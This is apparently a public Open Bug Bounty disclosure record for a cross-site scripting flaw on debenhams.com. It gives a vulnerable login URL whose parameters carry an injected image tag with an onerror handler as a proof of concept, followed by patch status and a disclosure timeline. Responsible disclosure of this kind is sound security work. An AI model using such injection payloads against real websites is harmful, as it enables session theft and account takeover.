debenhams.com XSS vulnerability

2016-09-28T10:20:00
ID OBB:184000
Type openbugbounty
Reporter ShivprasadSambhare
Modified 2017-05-17T08:23:00

Description

Vulnerable URL:
https://www.debenhams.com/webapp/wcs/stores/servlet/LogonForm?catalogId=%22%3E%3Cimg%20src=x%20onerror=prompt(/OPENBUGBOUNTY/)%3E%22&storeId;=10701&krypto;=zRQr7iWRbQ7GYWGKYtIMvIjt0RScqJu1XZsz3HsHpeP6ddOkxYjlxW0bH3LWm1D9%22%3E%3Cimg%20src=x%20onerror=prompt(/OPENBUGBOUNTY/)%3E%220UVOqdS2wCNDR0or9taO7meFjHbn6Y7575q0ssiZmsOFIOT%2BnhKUsdceqlyT3HES0i9r0k9k9cgLQoPZ9etBJjNVTU1NiCWFXzfLJlV8h7QQaqbD06i8pgEk3ylmvH0xKg9jsX65PKUgtOYkZExLtrKiEy9v7qlj8ns%2FDgIUOSH5lyesm%2BF%2BSZA2vp8wyyI5%2FshqjAXZ0wg92O7Hk5EeHXW5MtlTSl7cVJnJAXMHrRuifrd72dWN1SfHI7%2FHc3ZQS669vzf45z6RRmRy3KXtOMlHWexKXitlIDoK49kyCRG96zxKl7fMEWLJusAL94GI6XCp65VfyEEZ4ewAnZoMoT2GdUy5vm7708ZD0MUanIbre3Xsu43BhjHZpMTLsBY296B5%2BrP2u%2FsvezCzgc9iMpXSvOlVL7rEnN5uM3aWaLo6citCPa65mGUvCQZuUwWc9gclM7MTMPG%2FMuOpI39t1bK8oGa3XZaUcAX2DVKf2y00swB5TyZ8zqzzM2Ue7u2S5U4UMUdWGMcNDYcP%2BUjX9%2B6NS7dU628bupkeyjaXV657iwO0oyOFnPwmj4VS4800GeOCSgSfXgvkCtqgzLPueXzDEG5dUxUv2xAxshm9ICjiAMOmwt1nTY3AF5VH7yMwMfXVUFWTx2dKczkg8eGt8ZW1hdIC65qS9bzo4UkaJU7MY%2FB0Std6nlefMNsSBiCIShl%2B1hx5CrVy4S6beVUOxOAVR38lveYX%2FDgqNX0EDGAequ%2FQ31LBF%2B%2FTwySEhOTOcMHDt15d6Y9x2Z%2FeKml0MeKORLgU4Bfi6H4Y%2Bc26d0PF6zl8XjQnsql5IEkzXX%2FYurN8HFQHLGEo%2BhudxHJl2lg8PkMhDKidr8dsr7lU6Ys7e5nZG7h3hGDvD0SjW6fq5ZZwxu0FRbh3qPd%2Fk4AeUw%3D%3D&ddkey;=https:Logon
Details:

Description| Value
---|---
Patched:| Yes, at 16.05.2017
Latest check for patch:| 16.05.2017 14:37 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 5715
VIP website status:| Yes
Check debenhams.com SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 28 September, 2016 10:20 GMT
Generic security notifications sent to website owner| 28 September, 2016 10:22 GMT
Customized security notification sent to website owner| 28 September, 2016 10:22 GMT
Notification sent to subscribers (without technical details)| 28 September, 2016 14:17 GMT
Vulnerability details disclosed by researcher| 21 December, 2016 11:14 GMT
Vulnerability patched by the website owner| 17 May, 2017 08:23 GMT